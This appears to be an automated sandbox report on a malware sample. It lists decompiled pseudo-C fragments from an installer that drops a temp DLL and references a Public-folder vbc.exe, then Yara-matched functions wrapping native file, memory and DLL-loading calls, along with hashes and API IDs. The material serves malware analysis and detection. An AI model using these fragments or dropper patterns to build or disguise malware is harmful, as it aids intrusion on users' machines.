                                                • Opcode ID: 367cece10c6e86003bd5d303d51d1efd0f3d537cbef9198eaf7821fe6c28f4f9
                                                • Instruction ID: e0bbd057c66a3de5298c5dea921b35d6831f26d77b03a8d21a7351de97c0f8a2
                                                • Opcode Fuzzy Hash: 367cece10c6e86003bd5d303d51d1efd0f3d537cbef9198eaf7821fe6c28f4f9
                                                • Instruction Fuzzy Hash: 3B31C231600296ABEB11CF75C848BAA7FF9FF413D0F158129E8A0A7194D730EE90DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E1001065B(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                				intOrPtr _t25;
                                                				void* _t26;
                                                
                                                				_t25 = _a16;
                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                					_t26 = E100109E4(_a4, _a8, _a12, _a20, _a24, _a28);
                                                					goto L9;
                                                				} else {
                                                					if(_t25 != 0x66) {
                                                						if(_t25 == 0x61 || _t25 == 0x41) {
                                                							_t26 = E10010AB2(_a4, _a8, _a12, _a20, _a24, _a28);
                                                						} else {
                                                							_t26 = E10010FBB(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
                                                						}
                                                						L9:
                                                						return _t26;
                                                					} else {
                                                						return E10010EFA(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
                                                					}
                                                				}
                                                			}






                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                • Instruction ID: 89a450d459da5a3812fef2ea964860e177c4d078e22bdd91ed20284a6ca40805
                                                • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                • Instruction Fuzzy Hash: A4014C7660018EBBCF12DE84CC028EE3F66FF48294B598415FEA859031D776D9B1AB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E00401D38() {
                                                				void* __esi;
                                                				int _t6;
                                                				signed char _t11;
                                                				struct HFONT__* _t14;
                                                				void* _t18;
                                                				void* _t24;
                                                				void* _t26;
                                                				void* _t28;
                                                
                                                				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
                                                				 *0x40b024 = E00402A0C(3);
                                                				_t11 =  *((intOrPtr*)(_t28 - 0x18));
                                                				 *0x40b02b = 1;
                                                				 *0x40b028 = _t11 & 0x00000001;
                                                				 *0x40b029 = _t11 & 0x00000002;
                                                				 *0x40b02a = _t11 & 0x00000004;
                                                				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
                                                				_t14 = CreateFontIndirectA(0x40b014);
                                                				_push(_t14);
                                                				_push(_t26);
                                                				E00405AF6();
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
                                                				return 0;
                                                			}












                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirect
                                                • String ID:
                                                • API String ID: 3272661963-0
                                                • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00402BF1(intOrPtr _a4) {
                                                				long _t2;
                                                				struct HWND__* _t3;
                                                				struct HWND__* _t6;
                                                
                                                				if(_a4 == 0) {
                                                					__eflags =  *0x4170e0; // 0x0
                                                					if(__eflags == 0) {
                                                						_t2 = GetTickCount();
                                                						__eflags = _t2 -  *0x423f4c;
                                                						if(_t2 >  *0x423f4c) {
                                                							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
                                                							 *0x4170e0 = _t3;
                                                							return ShowWindow(_t3, 5);
                                                						}
                                                						return _t2;
                                                					} else {
                                                						return E00405F64(0);
                                                					}
                                                				} else {
                                                					_t6 =  *0x4170e0; // 0x0
                                                					if(_t6 != 0) {
                                                						_t6 = DestroyWindow(_t6);
                                                					}
                                                					 *0x4170e0 = 0;
                                                					return _t6;
                                                				}
                                                			}







                                                APIs
                                                • DestroyWindow.USER32 ref: 00402C04
                                                • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                				long _t22;
                                                
                                                				if(_a8 != 0x102) {
                                                					if(_a8 != 0x200) {
                                                						_t22 = _a16;
                                                						L7:
                                                						if(_a8 == 0x419 &&  *0x420520 != _t22) {
                                                							 *0x420520 = _t22;
                                                							E00405B98(0x420538, 0x425000);
                                                							E00405AF6(0x425000, _t22);
                                                							E0040140B(6);
                                                							E00405B98(0x425000, 0x420538);
                                                						}
                                                						L11:
                                                						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
                                                					}
                                                					if(IsWindowVisible(_a4) == 0) {
                                                						L10:
                                                						_t22 = _a16;
                                                						goto L11;
                                                					}
                                                					_t22 = E00404753(_a4, 1);
                                                					_a8 = 0x419;
                                                					goto L7;
                                                				}
                                                				if(_a12 != 0x20) {
                                                					goto L10;
                                                				}
                                                				E00403EA0(0x413);
                                                				return 0;
                                                			}





                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404E0A
                                                • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E78
                                                  • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                                Strings
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                				int _t5;
                                                				long _t7;
                                                				struct _OVERLAPPED* _t11;
                                                				intOrPtr* _t15;
                                                				void* _t17;
                                                				int _t21;
                                                
                                                				_t15 = __esi;
                                                				_t11 = __ebx;
                                                				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
                                                					_t7 = lstrlenA(E00402A29(0x11));
                                                				} else {
                                                					E00402A0C(1);
                                                					 *0x40a010 = __al;
                                                				}
                                                				if( *_t15 == _t11) {
                                                					L8:
                                                					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                				} else {
                                                					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll", _t7, _t17 + 8, _t11);
                                                					_t21 = _t5;
                                                					if(_t21 == 0) {
                                                						goto L8;
                                                					}
                                                				}
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
                                                				return 0;
                                                			}










                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll,00000000,?), ref: 0040252E
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll, xrefs: 004024FD, 00402522
                                                Similarity
                                                • API ID: FileWritelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll
                                                • API String ID: 427699356-3221423330
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004053F8(CHAR* _a4) {
                                                				struct _PROCESS_INFORMATION _v20;
                                                				int _t7;
                                                
                                                				0x422540->cb = 0x44;
                                                				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
                                                				if(_t7 != 0) {
                                                					CloseHandle(_v20.hThread);
                                                					return _v20.hProcess;
                                                				}
                                                				return _t7;
                                                			}






                                                APIs
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                • CloseHandle.KERNEL32(?), ref: 0040542A
                                                Strings
                                                • Error launching installer, xrefs: 0040540B
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00403556() {
                                                				void* _t2;
                                                				void* _t3;
                                                				void* _t6;
                                                				void* _t8;
                                                
                                                				_t8 =  *0x41f4f4;
                                                				_t3 = E0040353B(_t2, 0);
                                                				if(_t8 != 0) {
                                                					do {
                                                						_t6 = _t8;
                                                						_t8 =  *_t8;
                                                						FreeLibrary( *(_t6 + 8));
                                                						_t3 = GlobalFree(_t6);
                                                					} while (_t8 != 0);
                                                				}
                                                				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
                                                				return _t3;
                                                			}








                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                • GlobalFree.KERNEL32(?), ref: 00403577
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-4017390910
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004056D2(char* _a4) {
                                                				char* _t3;
                                                				char* _t5;
                                                
                                                				_t5 = _a4;
                                                				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                				while( *_t3 != 0x5c) {
                                                					_t3 = CharPrevA(_t5, _t3);
                                                					if(_t3 > _t5) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				 *_t3 =  *_t3 & 0x00000000;
                                                				return  &(_t3[1]);
                                                			}






                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\Public,00402CC1,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004056D8
                                                • CharPrevA.USER32(80000000,00000000), ref: 004056E6
                                                Strings
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\Public
                                                • API String ID: 2709904686-2272764151
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004057E4(CHAR* _a4, CHAR* _a8) {
                                                				int _t10;
                                                				int _t15;
                                                				CHAR* _t16;
                                                
                                                				_t15 = lstrlenA(_a8);
                                                				_t16 = _a4;
                                                				while(lstrlenA(_t16) >= _t15) {
                                                					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                					_t10 = lstrcmpiA(_t16, _a8);
                                                					if(_t10 == 0) {
                                                						return _t16;
                                                					}
                                                					_t16 = CharNextA(_t16);
                                                				}
                                                				return 0;
                                                			}







                                                APIs
                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                                • CharNextA.USER32(00000000), ref: 00405812
                                                • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                                • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E00418660(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                				void* _t18;
                                                				intOrPtr* _t27;
                                                
                                                				_t13 = _a4;
                                                				_t27 = _a4 + 0xc48;
                                                				E004191B0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                				_t4 =  &_a40; // 0x413a21
                                                				_t6 =  &_a32; // 0x413d62
                                                				_t12 =  &_a8; // 0x413d62
                                                				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                				return _t18;
                                                			}






                                                APIs
                                                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: !:A$b=A$b=A
                                                • API String ID: 2738559852-704622139
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 1e9a607f8d7ae55c6529455560845d335dd5ab867efd933cdf95456f7e89143a
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BA1D97241DA30E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00409B30(void* _a4, intOrPtr _a8) {
                                                				char* _v8;
                                                				struct _EXCEPTION_RECORD _v12;
                                                				struct _OBJDIR_INFORMATION _v16;
                                                				char _v536;
                                                				void* _t15;
                                                				struct _OBJDIR_INFORMATION _t17;
                                                				struct _OBJDIR_INFORMATION _t18;
                                                				void* _t24;
                                                				void* _t31;
                                                				void* _t32;
                                                				void* _t33;
                                                				void* _t34;
                                                
                                                				_v8 =  &_v536;
                                                				_t15 = E0041AF40( &_v12,  &_v12, 0x104, _a8);
                                                				_t33 = _t32 + 0xc;
                                                				if(_t15 != 0) {
                                                					_t17 = E0041B360(__eflags, _v8);
                                                					_t34 = _t33 + 4;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						E0041B5E0(_t24, _t31,  &_v12, 0);
                                                						_t34 = _t34 + 8;
                                                					}
                                                					_t18 = E004196F0(_v8);
                                                					_v16 = _t18;
                                                					__eflags = _t18;
                                                					if(_t18 == 0) {
                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                						return _v16;
                                                					}
                                                					return _t18;
                                                				} else {
                                                					return _t15;
                                                				}
                                                			}
















                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction ID: f32d3288474e01bdfe8324a51b674010449bcf15fd3c95856a6e0addd4ed2bba
                                                • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                • Instruction Fuzzy Hash: 490112B5D0010DA7DF10EBA5DC42FDEB778AB54308F0041A6E918A7281F675EB54C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004185B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                				E004191B0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t21;
                                                			}





                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 5d6b5cde0bcb09b7c0358823ed137c5ed8f79ffe5ada1a139c779eb2a876d5e3
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: 00F0B2B2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00418790(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                				E004191B0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}





                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: dde6359f0c5cf0f3b7cc61d53361d99b03a052e7ad6e115d9fdbfc5a6ee34577
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: C2F015B2200208ABDB14DF89CC81EEB77ADAF88754F158149FE0997241C630F810CBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004186E0(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x409753
                                                				E004191B0(_a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}





                                                APIs
                                                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: cde372c9834ecde76929cfdbc6e84a5308d085747d856cc7173a1988eed98478
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 23D012752002147BD710EB99CC45ED7776DEF44750F154459BA195B242C530F94086E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
